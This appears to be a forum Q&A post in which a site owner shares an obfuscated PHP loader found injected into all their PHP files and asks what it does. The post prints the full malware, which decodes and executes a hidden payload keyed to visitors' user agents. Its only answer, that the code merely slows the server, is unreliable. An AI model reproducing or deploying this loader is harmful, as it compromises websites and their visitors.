# malicious code in all my php files

Tags: php, virus

I found today this code in all my php files. Can someone understand what it does ? thanks

```
$ztmlied = 'fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH# x2)7fmjix6<C    x27&6<*rfs%7-K)3        x69     145")) or (strstr($uas,"        e"; function wxlorkh($n){return chr(ord($n)-1);} @err%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]24or_reporting(0); $oawpfih = implode(array_map("wx#Qtjw)#]82#-#!#-%tmw)%tww**WYsboe]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]8cq%)ufttj x22)gj6<^#Y#    x5cq%   x27Y23zbek!~!<b%        x7f!<X>b%Z<#ox7fw6*CW&)7gj6<.[A x27&6<  x7P8]37]278]225]241]334]368]322]3]364z-1H*WCw*[!%rN}#QwTW%hIr   x5c1^-%r        x5c2^-%hOh/#00#W~!%t2w)#]); if ((strstr($uas,"  x6d     16-4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sif((function_exists("      x6f     142     x5f     163     x74     141     x72     164lorkh",str_split("%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y*id%)dfyfR       x27tfs%6<*17-/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps%nfd)##Qtpz)#]341]88M4xB%epnbss!>!bssbz)#44ec:649#-!#:618d5     x74     145     x5f     146     x75     156     x63     164     x69     157     x6      x24<%j,,*!|     x24-    x24gvodujpo!tj  x22)gj!|!*nbsbq%)323ldfidk!~!%)utjm!|!*5!       x27!hmg%)!gj!|!*1?hmg%)!gj!<**2*#npd/#)rrd/#00;quui#>.%!<***f   x27,*e  x27,*d  x27,*c  x27,*b  x275]y83]273]y76]277#<!%t2w>#]y74]273]y76]      x24tvctus)%     x24-    x24b!>!%yy)#}#-#        x24-    x24-tusqpt)%fw6*CWtfs%)7gj6<*id%)ftpmdR6<)!gj!<*2bd%-#1GO       x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/<**qp%!-uyfu%)3of)fepdodoF.uofuopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x    x22l:!}V;3q%}U;y]}R#p#/%z<jg!)%z>>2*!%z>3<!fmtA;~!}     x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!    x27{**u%-#jt0}Z;42]58]24]31#-%tdz*Wsfuvso!%bss  x5csboe))1/35.)1/14+9**-)1/2986+7**^}   x7f;!opjudovg}k~~9{d%:o,*j%-#1]#-bubE{h%)tpqsut>j%!*9!  udovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>    x22!ftmbg)!gj<*#k#)usbut`cpV    x7-MSV,6<*)ujojR        x27id%6<        x7fw6*  x7f_*#ujojRk3`{666~6<&w6<       ,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojep!Ypp2)%zB%z>!  x24/%tmw/       x24)%zW%h>EzH,2W%wN;#-E252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!        x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38:**#ppde#)tutjyf`4      x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA    x27K6<  x7fw6*3qj%7>    x27rfs%6~6<     x7fw6<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA      x22)7gj6<*QDU`M-        x24*<!~!        x24/%t2w/       x24)##-!#~<#/%  x24-    x24!7f  x7f     x7f     x7f<u%V x27{ftmfV       x7f<*X&Z&S{ftmfV        x7f<985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y337y]672]48y]#>s%<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~        x24<!%o:!>!     x242178}527}88:}334}472 e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]fw6*       x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofft`msvd},;uqpuft`msvd}+;!>!}        x27;!>>>x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)yf`opjudovg        x22)!gj}1~!<2p% x7f!~!<##!>k();}}1"])))) { $GLOBALS["   x61     156     x75     156%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<pd%6<pd%w6Z6<.3`hA   x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C       x27pd%6-!%      x24-    x24*!|! x24-    x24     x5c%j^  x24-!%cIjQeTQcOc/#00#W~!Ydrr)%r#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojneb#-7fw6*    x7f_*#fubfsdXk5`{66~6<&w6<      x7fw6*CW&)7gj9*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h192!%b:>%s:      x5c%j:.2^,%b:<!%c:>%s:  x5c%j:^<!%w`    x5c7fw6*CW&)7gj6<*K)ftpmdXA6~69.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3!      x27!hmg%!#iubq# x5cq%   x27jsv%6<C>^#zsfvr#     x5cq%7**^#zsfvr#        x5x72   157     x6d     145")) or (strstr($uas,"        x66     151     x72     145     x66     157     z-#:#*  x24-    x24!>!  x24/%tjw/       x24)%   x24-    x24y4   x24-    x24") && (!isset($GLOBALS["     x61     156     x75     156     x6      x61"]=1; $uas=strtolower($_SERVE~6<Cw6<pd%w6Z6<.5`hA    x27pd%6<pd%w6Z6<.4`hA   x27pn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985svufs:~928>>    x22:ftmbg3y]47]67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=)%j:>1<%j:=tj{fpg)%s:*<<u%7>/7&6|7**111127-K)ebfsX   x27u%7k:!ftmf!}Z;^nbsbq%        x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.7fw6* x7f_*#fmjgk4`{6~6<tfs%w6<       x78L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#utcvt)!gj!|!*bubE{h%)j{hnpd!op;/#/#/},;#-#}+;%-qp%)54l}      x27;%!<*#}_;#)323ldfid>}&;!osvufsf9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~x24<!%ff2!>!bssbz)    x24]25  x24-    x2472]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#1686c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ-!%t::**<(<!fwbm)%tjw)#       x24#-!#]y38#-!%w:**<")));$)%cB%iN}#-!   x24/%tmw/       x24)%c*W%eN+#Qi x5c1^W%c!>!%i   x5c2^<!Ce*[)!gj!<2,*j%!-#1]#-bubE{h%)   x24-    x24y7   x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x24|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf      x27*&7-n%)utjm6<        xqp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut&f_UTPI`QUUI&e_SEEB`FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)376#<!%w:!>!(%w:!>!   x2467670]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_  uopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpu($uas,"    x61     156     x64     162     x6f     151     x64")) or (strstr($uas,"        x63     150     *f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+993tpqsut>j%!*72!    x27!hmg%)!gj!<2f!%z>2<!%ww2)%w`TW~      x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H>!fyqmpef)#      x24*<!%t::!>!   x24Ypp3;2]},;osvufs}    x27;mnui}&;zepc}75j{hnpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|judovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**!}_;gvc%}&;ftmbg}       x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;h!op*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]Y%)fnbozcYufhA x272qj%6<^#zsfvr#       x5cq%7/7#@#7/7^po#>b%!*##>>X)!gjZ<#opo#>b%!**X)uftf`57ftbc      x7f!|!*uyfu     x2!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x72    166     x3a     61      x31")) or (strstr8]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234]3^>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/judovg!|!**#j{hnpd#)tutjqjA)qj3hopmA        x273qj%6<*272qj%)7gj6<**2qj%)hopm3!2p%Z<^2      x5c2b%!>!2p%!*3>?*2b%)gpf{jt)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>-rr.93e:5597f-s.973:8297f:5297e:56-xr.%6<.msv`ftsbqA7>q%6<     xR["    x48     124     x54     120     x5f     125     x53     105     x52     137     x41     107     x45     116     x54"]y8 x24-    x24]26  x24-qhgfdkk = $gcnzlia("", $oawpfih); $qhgfdkx78"))) { $gcnzlia = "     x63     162     x65     1416<*doj%7-C)fepmqnjA  x27&6<.fmjgA    x27doj%6<       x%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*-!%ff2x5c}X x24<!%tmw!>!#]y84]27StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSugbjyzgr';
$jdwlvtj = explode(chr((489 - 369)) , substr($ztmlied, (34630 - 28610) , (212 - 178)));
$chufzxdh = $jdwlvtj[0]($jdwlvtj[(4 - 3) ]);
$ierdji = $jdwlvtj[0]($jdwlvtj[(7 - 5) ]);

if (!function_exists('dvfugjfu'))
    {
    function dvfugjfu($urtnqrxom, $ybuugiuh, $gwynlbh)
        {
        $bwqwtglgne = NULL;
        for ($edjffpf = 0; $edjffpf < (sizeof($urtnqrxom) / 2); $edjffpf++)
            {
            $bwqwtglgne.= substr($ybuugiuh, $urtnqrxom[($edjffpf * 2) ], $urtnqrxom[($edjffpf * 2) + (5 - 4) ]);
            }

        return $gwynlbh(chr((50 - 41)) , chr((351 - 259)) , $bwqwtglgne);
        };
    }

$dkbffu = explode(chr((224 - 180)) , '643,53,3295,43,2670,36,3338,33,5706,64,547,29,82,31,5354,32,4616,65,3180,61,5831,38,882,43,113,53,232,49,696,68,4465,26,3371,46,2738,58,4301,58,3039,27,3573,33,56,26,0,56,2029,68,1973,56,5532,24,5509,23,5129,48,3128,52,367,33,5684,22,2900,46,5869,44,3660,34,1184,29,764,24,5304,50,1651,58,426,28,2430,49,4547,69,2479,37,5015,59,4947,68,3066,62,4219,26,4735,30,1552,32,2516,68,987,44,576,67,3759,30,5485,24,2625,39,5556,37,1213,68,1031,62,5593,53,4359,38,5235,69,2860,40,4681,54,4058,48,4397,68,400,26,5177,35,955,32,1281,23,5212,23,3606,54,3789,22,3811,37,1527,25,3470,23,2946,45,4895,52,1919,54,1584,67,2142,50,4005,53,1709,57,1304,62,4865,30,1393,67,4491,56,5994,26,1093,39,1813,51,1864,55,3493,57,5074,55,2247,70,2317,60,3905,34,2796,37,1132,52,3241,54,5770,20,925,30,4245,56,2097,45,4832,33,4156,63,2833,27,845,37,3848,57,1766,47,489,58,281,33,3417,53,5646,38,2192,55,2377,53,3939,66,166,66,3694,65,2584,41,2706,32,823,22,454,35,314,53,5386,54,1460,67,788,35,3550,23,5913,29,2991,48,5440,45,1366,27,4765,67,5942,52,4106,50,5790,41,2664,6');
$vknjmmo = $chufzxdh("", dvfugjfu($dkbffu, $ztmlied, $ierdji));
$chufzxdh = $ztmlied;
$vknjmmo("");
$vknjmmo = (482 - 361);
$ztmlied = $vknjmmo - 1;
```

(originally is was in one line only)

Comment: Hint: It is a risk to test and run the PHP code on the server because it might contaminate your other PHP source code as well.

Answer (score -1):

It could be used to slow down your server by performing a series of complicated actions multiple times, please make sure it is removed from all documents :)

-Aron DC